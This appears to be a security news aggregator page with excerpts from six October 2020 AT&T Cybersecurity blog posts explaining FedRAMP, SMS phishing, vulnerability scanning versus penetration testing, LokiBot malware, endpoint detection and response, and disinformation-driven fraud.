2020-10-30 18:33:00 | What is FedRAMP? Compliance and certification explained (lien direct) | This blog was written by a third party author The Federal Risk and Authorization Management Program (FedRAMP) is a compliance program established by the US government that sets a baseline for cloud products and services regarding their approach to authorization, security assessment, and continuous monitoring. The program’s governing bodies include the Office of Management and Budget (OMB), US Department of Homeland Security (DHS), National Institutes of Standards & Technology (NIST), US General Services Administration (GSA), US Department of Defense (DoD), and the Federal Chief Information Officers (CIO) Council. Any cloud service providers that wish to offer products and services to the US government must establish FedRAMP compliance. Applying the NIST Special Publication 800 series as a baseline, FedRAMP requires cloud service providers to undergo an independent security assessment conducted by a third-party assessment organization (3PAO) to ensure authorizations comply with the Federal Information Security Management Act (FISMA). Note: The foundations of FedRAMP involve a significant number of acronyms, and as much as we tried to keep them to a minimum, they’re an essential part of the story. FedRAMP was established to: Ensure that cloud systems used by government agencies have adequate safeguards in place Eliminate duplication efforts and reduce risk management costs Enable cost-effective and rapid government procurement of cloud services The goals for FedRAMP (according to FedRAMP.gov) are: Advancing the adoption of secure cloud solutions through reuse of assessments and authorizations Improving confidence in the security of cloud solutions and security assessments Achieving consistency of security authorizations with a set of agreed-upon standards for cloud product approval, in or outside of the program Ensuring consistency in the application of existing security practices Increasing automation and near real-time data for continuous monitoring Requirements for FedRAMP certification One of the most critical factors for successful government adoption of cloud computing is verifying that essential security controls are executed on any cloud solution that stores, processes, and transmits government data. With FedRAMP, cloud systems must also meet the security levels and needs for protecting government data as verified by 3PAO audit. The FedRAMP requirements apply to cloud service providers (CSP) and cloud service offerings (CSO). Depending on the application, the two acronyms (CSPs and CSOs) are used interchangeably. Other important FedRAMP acronyms include the authority to operate (ATO) and the FedRAMP Program Management Office (PMO). Reviewing the mandates for CSPs CSPs must prove that they meet FedRAMP compliance requirements before a federal agency can use them. The authorization mechanism is called the FedRAMP Authority to Operate (ATO). How the cloud service provider is authorized can be a significant decision for any CSP planning to offer products and services to federal agencies. There are two methods for obtaining a FedRAMP Authorization to Operate (ATO): directly from a government agency or the Joint Authorization Board (JAB). The latter authorization is known as FedRAMP Provisional Authorization to Operate (P-ATO). Achieving a P-ATO is a more stringent process that is only available after a CSP has achieved several individual Agency ATOs. It requires assessment and approval by the by the Joint Authorization Board (JAB) comprised of the Department of Homeland Security (DHS), Department of Defense (DoD) and the General Services Administration (GSA). CSPs must achieve the following high-level requirements for FedRAMP certification, authorization, and compliance by the | Guideline | ||
|
2020-10-30 05:01:00 | What is Smishing? SMS phishing explained (lien direct) | This blog was written by a third party author. What is SMS phishing? SMS phishing, or “Smishing,” is a mobile phishing attack that targets victims via the SMS messaging channel rather than through email. A natural evolution of the phishing phenomenon, smishing attacks attempt to dupe mobile users with phony text messages containing links to legitimate looking, but fraudulent, sites. These smishing sites try to steal credentials, propagate mobile malware, or perpetrate fraud. Though smishing has crept into users' text messaging streams for over a decade now, the technique has long flown under the radar with relatively small global attack volumes over the years. However, that's changing as cybercriminals seek to profit off of today's mobility and remote work trends. Approximately 81% of organizations say their users faced at least some level of smishing attacks in 2019. Right before COVID-19 hit, smishing volume was already on the uptick. Between the last quarter of 2019 and the first quarter of 2020, mobile phishing attacks—including smishing—rose by 37%. As the lockdown era spurs on a wave of remote work and increased reliance on mobile devices, smishing numbers continue to climb. One study reported a 29% growth in smishing between March and July 2020. "On a small screen and with a limited ability to vet links and attachments before clicking on them, consumers and business users are exposed to more phishing risks than ever before," says IDC's Phil Hochmuth. "In a mobile-first world, with remote work becoming the norm, proactive defense against these attacks is critical.” Common types of Smishing attacks The allure of smishing to the cybercriminal community has obviously grown stronger due to a greater prevalence of text messaging in mobile users' lives in recent years. However, the bad guys are arguably even more drawn to smishing due to the differences in how users interact with SMS messaging compared to email. The sense of urgency is higher for text messages and their open rates are considerably higher than email. According to MobileMarketer.com, while email recipients only open about 20% of their messages, SMS recipients open 98% of their texts. Consequently, big brands are increasingly using text messages rather than email for things like marketing messages, shipping verification, and account notifications. Added to the mix is the preference for SMS as a channel for multi-factor authentication, meaning that many mobile users have been habituated to interact with text messages in some way or other during the login process of many of their cloud, retail, and banking accounts. All of this creates a prime breeding ground for smishing attackers to perpetrate their fraud, as users are highly engaged with and very likely to act quickly on most text messages that come their way. The bad guys take advantage of that sense of immediacy and tailor the attacks to mimic the various ways that brands regularly interact with customers via SMS. Listing common SMS phishing tactics Some very common types of smishing messages include: Fake shipping notifications Tech support impersonation Phony bank account balance warnings Counterfeit customer service notices Prize notifications for made-up rewards Bogus Covid-19 contact tracing messages These messages are used to trick the user into either downloading a fraudulent app or opening a link to password stealing or fraud-inducing mobile sites. Further aiding the | Threat | ||
|
2020-10-29 05:01:00 | Vulnerability scanning vs. Penetration testing: comparing the two security offerings (lien direct) | This blog was written by a third party author. It’s no secret: the number of security vulnerabilities organizations must contend with is overwhelming. According to a 2019 Risk Based Security report, there were 22,316 newly-discovered vulnerabilities last year. One Patch Tuesday disclosed a record number of 327 vulnerabilities in a single day. Just keeping up is becoming a monumental task. But knowing where and how your organization may be vulnerable is critical to maintaining a healthy security posture. As vulnerabilities add up and the threat landscape widens, two crucial strategies for understanding where you are and where you need to be security-wise are vulnerability assessments and penetration tests. At the very core, almost all organizations should be doing both. If you’re not, you may be exposing yourself to great risks. It’s easy to understand why some may confuse the two strategies (they are complimentary, after all), but there are key differences between vulnerability assessments and penetration testing. The differences between vulnerability scanning and penetration testing Vulnerability scanning is typically conducted with software leveraging automated processes and looks for known vulnerabilities in various systems. Once complete, a report on risk exposure is generated. Penetration testing (or pen tests), on the other hand, leverages manual processes and is typically carried out by a cybersecurity expert or experts that try to find holes and exploits within your system architecture. Penetration testing is sometimes referred to as ethical hacking, in that you are enlisting the help of a third party to “hack” into your systems to see if they are easily penetrable. Vulnerability testing determines the extent to which critical systems and sensitive information are vulnerable to compromise or attack due to outstanding patches and / or common security misconfigurations. Penetration testing takes this a step further to exploit the vulnerabilities identified in order to gain access to critical systems, sensitive information, or a specified trophy. While automated vulnerability scanning can help you identify security flaws that need remediation, it can’t holistically help you evaluate the strength of your organization’s security controls against complex strategies a human attacker might employ. For instance, chaining multiple vulnerabilities together to leverage them as a part of the overall kill chain. Here’s an analogy that underscores the difference between the two strategies. If your systems were a car and the threat landscape were rough roads and icy conditions, a vulnerability scan would represent the vehicle’s 10-point check — tires, suspension, engine, etc. A pen test would represent the equivalent of taking the car on a test drive down a rough road in bad weather to see how everything holds up. It's important to remember that a pen test isn't just capitalizing on vulnerabilities that a vulnerability scanner would discover. Pen tests dig deeper into those configurations and interactions between devices and systems (and where they are located) that can be exploited. There are many cases in which your environment “passes” a vulnerability scan without any identified issues but could still be insecure. You wouldn’t know this without a proper pen test. Why perform vulnerability scans or pen tests? New vulnerabilities are discovered and disclosed every day. While compliance mandates or basic security strategies may dictate that you need to patch at least monthly, vulnerability scans executed more frequently are recommended. This way, organizations can benefit significantly by gaining an accurate representation of their security profile. Depending on the co | Vulnerability Threat | ||
|
2020-10-28 11:00:00 | LokiBot Malware: What it is and how to respond to it (lien direct) | This blog was written by an independent guest blogger. The Cybersecurity and Infrastructure Agency (CISA) of the U.S. Department of Homeland Security recently announced that activity in LokiBot, a form of aggressive malware, has increased dramatically over the last two months. The activity increase was discovered by an automated intrusion detection system referred to as EINSTEIN, which the Department of Homeland Security uses for collecting and analyzing security information across numerous government agencies. Following the detection, CISA issued a security advisory warning to Federal agencies and private sector entities alike about the malware. Malware is essentially a piece of software or firmware that is intentionally placed into a system (or host) for malicious purposes (hence the term ‘malware’). It has long been a major problem, but it’s only become worse since the coronavirus pandemic began as hackers and cybercriminals have sought to take advantage of the chaos created by the situation. LokiBot is one such example. In this article, we will dive into what exactly LokiBot is and the threat it poses, the techniques that were used to deploy this malware, and then the steps you can take to remove it from an infected system. What is Lokibot? LokiBot was first released on underground forums for hackers to target Microsoft Android phones in early 2016. Since then, it has grown to become a much more widespread and dangerous threat than it originally was, as it has been widely distributed via torrent files and email spam (among other techniques) by low-to-mid level hackers targeting passwords. At this point, LokiBot is among the most prevalent forms of malware, and for 2020 has actually been the single most common form of malware used to attack command-and-control servers. LokiBot can infect computers and mobile devices alike by searching for locally installed applications. The malware then searches for credentials from the internal databases of those applications and attempts to extract them. LokiBot also comes with a keylogging feature that allows it to capture keystrokes in order to determine the passwords used for accounts that may not be stored in those internal databases as well. As a result of these capabilities, mobile applications, cryptocurrency wallets, emails, and browsers alike are all vulnerable to LokiBot. The good news is that LokiBot is far invincible. For example, storing your data in the cloud will be one of the best defense measures that you can make because your data will be stored encrypted, decentralized, and ultimately harder to obtain. How big of a threat does LokiBot pose? Even though LokiBot has become much more prominent than it once was, the real question that needs to be asked is: even though it’s common, how big of a threat actually is it? One of the biggest concerns with LokiBot isn’t just the fact that it can target everything from emails to cryptocurrency wallets, it’s also that it can create a backdoor to allow a hacker to install additional malicious software and steal information. LokiBot also makes use of a very simple codebase that makes it easy for lower level cybercriminals to use. If anything, it’s for this reason that it’s become so widely used. Furthermore, LokiBot utilizes methods to make it seem like nothing is hap | Spam Malware Threat | ||
|
2020-10-28 05:01:00 | What is endpoint detection and response? EDR security explained (lien direct) | This blog was written by a third party author. The evolving endpoint attack surface As recent global health events have changed the world, the cybersecurity landscape has changed along with it. Almost all organizations — large or small — have seen their attack surface grow. For those unfamiliar with the term, an attack surface represents the sum total of all the ways in which a bad actor can exploit an endpoint or network to retrieve data. Every endpoint that connects to or communicates with the network is part of the network attack surface. It’s important to note that people are an essential element of an attack surface. Your employees represent a gateway to your network and critical data. The attack surface is not only a critical measure for large business but smaller and mid-sizes organizations as well. While many small businesses may believe they aren’t big enough to be hacked, the size of their attack surface — which is probably expanding — may be enough to expose it to serious risk. The endpoint attack surface has evolved further than what experts predicted. Today’s attack surface for most organizations is broader and more complex than ever before due to a combination of factors, including the shift to a work from home (WFH) model, and more smartphones and IoT devices connecting to networks in unprecedented numbers. What is endpoint detection and response? Endpoint Detection and Response (EDR) is the process of monitoring and detecting, in real-time, any suspicious activity or events occurring at the endpoint. The goal of EDR solutions is to allow your company visibility into threats on a detailed timeline and provide real-time alerts in the event of an attack. EDR, at its core, should provide visibility — one of the most critical security capabilities. As the attack surface widens, organizations are increasingly relying on endpoint detection and response (EDR) solutions for that next level of visibility and to alert on any attacks that may not be triggered by firewall or IDS/IPS rules. A good analogy for EDR is to think of EDR like a black box used on airplanes to record flight data. In this analogy, the airplane represents your endpoints and the black box represents the endpoint data such as the running processes, installed programs, and network logins of your devices (or threat surface). Just like how black box data can prevent similar crashes in the future, EDR can help prevent similar future cyberattacks. The benefits of EDR security With the right EDR solution, IT and security teams gain the visibility they require to reveal the type of threats that would otherwise would have gone unseen. When EDR is properly deployed in your organization, you can look forward to the following benefits: Unified security management - Having all of your business-critical devices — including mobile devices, fixed endpoints, and server environments —visible through a “single pane of glass” makes managing and securing everything easier. Safeguard against key threat vectors — Especially in the current WFH (work from home) climate, mobile endpoints must be protected against key threat vectors both inside and outside the corporate network’s safe perimeter. Identify and close security gaps — Gaps in endpoint security are easily overlooked, especially as the amount of data, apps, and connections increase in number and complexity. With improved visibility of your endpoints on the perimeter, these gaps can shift to the forefront. Simplify endpoint management — Any robust EDR solution brings many security tools and layers together so data from each can be shared, protecting your organization from multiple angles. This simplified management allows you to focus on your business instead of using pr | Threat | ||
|
2020-10-27 11:00:00 | Duped, deluded, deceived: How disinformation defrauds you (lien direct) |
This blog was written by an independent guest blogger.
The rise of social media has no doubt been one of the major revolutions of the 21st century. It’s brought about a whole new way for people to connect and share information with others, regardless of their geographical locations. But along with these more noble intentions of social media, there will always be abuse of these platforms – and one of the big ones is the spread of disinformation.
Disinformation (Merriam-Webster)
noun
dis·in·for·ma·tion | \ (ˌ)dis-ˌin-fər-ˈmā-shən \
Definition of disinformation
: false information deliberately and often covertly spread (as by the planting of rumors) in order to influence public opinion or obscure the truth
Cybercriminals also use this tactic as a way to spread fear or force less scrupulous members of the public down a route that furthers their own agendas, or indeed defrauds them. A classic example of this is the COVID-19 pandemic. In March, the Telco Security Alliance identified a 2000% increase in COVID related IoCs in its report. One notable tactic used was cybercriminals attempting to impersonate the CDC to get users to take a test or download malicious executables.
While these email fraud attempts on their own might not seem like they would be effective to the discerning recipient, combine them with the barrage of social media posts these people might see in a given day – and you have what psychologists call an “illusory truth effect”. This refers to the phenomenon where people start to believe statements they see repeated time and again more than non-repeated ones. The more a person sees a piece of information, the more likely there are to start believing that it’s true. So, when we look at the COVID-19 scenario – just consider how much information gets repeated daily online and on social media in relation to vaccines and so-called “cures”. Now say that user has seen these pieces of disinformation repeatedly within their social networks posted by people they trust – combined with the fear they may already be feeling about the situation – s/he will be more vulnerable to attempts by cybercriminals to defraud them.
This has huge impacts on the general public, as well as organizations whose employees all have potentially exploitable email addresses and mobile devices and is a topic that will be explored more in-depth during Security Serious Week: Action Against Disinformation taking place 26th – 30th October 2020. You can also catch AT&T Cybersecurity’s own Theresa Lanowitz on Thursday 29th October on the panel discussion: Duped, Deluded, Deceived: How Disinformation Defrauds You. The virtual panel session will unpack how cybercriminals use disinformation to manipulate individuals and how we can protect employees from falling foul of these attempts.
Register now here: https://attendee.gotowebinar.com/register/2743836075601893646?source=Eskenzi+Website
|
To see everything:
Our RSS (filtrered)
